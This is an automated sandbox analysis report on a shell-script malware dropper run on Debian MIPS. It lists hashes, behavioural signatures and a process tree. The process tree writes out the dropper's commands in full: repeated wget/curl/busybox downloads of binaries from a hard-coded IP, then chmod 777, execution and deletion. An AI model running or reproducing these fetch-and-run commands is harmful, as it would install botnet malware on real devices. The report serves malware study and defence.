Analysis
-
max time kernel
69s -
max time network
71s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/10/2024, 01:06
Static task
static1
Behavioral task
behavioral1
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh
-
Size
10KB
-
MD5
a16f2f2454e5b18f780fd0e5f5db5230
-
SHA1
f8c9a2379edf5ce246d41383617f895ef5840d7c
-
SHA256
0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3
-
SHA512
79ee2c5eb57fb5281133280b36b26033038ef2ee4641bba5561500c47537cc2b656a2e7810a2879954bb95b143811d44dd0c01eee312b69c3267042254d35f92
-
SSDEEP
192:lVkP23rABx8p/2aJMkxUAQtiZEYq3rABxu2aJMkxkAQtiZEL:lVkP23rABx8p/2aJMkxbBq3rABxu2aJW
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 937 chmod 795 chmod 919 chmod 979 chmod 985 chmod 925 chmod 991 chmod 973 chmod 1003 chmod 1009 chmod 907 chmod 931 chmod 886 chmod 775 chmod 838 chmod 901 chmod 913 chmod 943 chmod 769 chmod 895 chmod 949 chmod 955 chmod 961 chmod 997 chmod 825 chmod 880 chmod 860 chmod 967 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh 770 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt 776 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 796 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh 827 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI 839 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH 861 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz 881 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN 887 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 896 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk 902 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM 908 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo 914 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd 920 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl 926 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd 932 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl 938 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh 944 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt 950 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 956 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh 962 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI 968 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH 974 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz 980 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN 986 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 992 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk 998 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM 1004 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo 1010 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM curl File opened for modification /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh curl File opened for modification /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt curl File opened for modification /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh curl File opened for modification /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz curl File opened for modification /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl curl File opened for modification /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk curl File opened for modification /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo curl File opened for modification /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI curl File opened for modification /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM curl File opened for modification /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo curl File opened for modification /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 curl File opened for modification /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN curl File opened for modification /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 curl File opened for modification /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH curl File opened for modification /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 curl File opened for modification /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh curl File opened for modification /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh curl File opened for modification /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt curl File opened for modification /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd curl File opened for modification /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk curl File opened for modification /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz curl File opened for modification /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 curl File opened for modification /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN curl File opened for modification /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd curl File opened for modification /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl curl File opened for modification /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI curl File opened for modification /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH curl
Processes
-
/tmp/0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh/tmp/0aa914c0d644e5aba7e457fb632f330f136f2c7251f7eb403f436a23e03ca2f3.sh1⤵PID:739
-
/bin/rm/bin/rm bins.sh2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:767
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:774
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:776
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:777
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:778
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:790
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:799
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:800
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:818
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:831
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:837
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:840
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:841
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:855
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:879
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:885
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:891
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:900
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:906
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:912
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:918
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:924
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:930
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:936
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:942
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:948
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:954
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:960
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:966
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:968
-
-
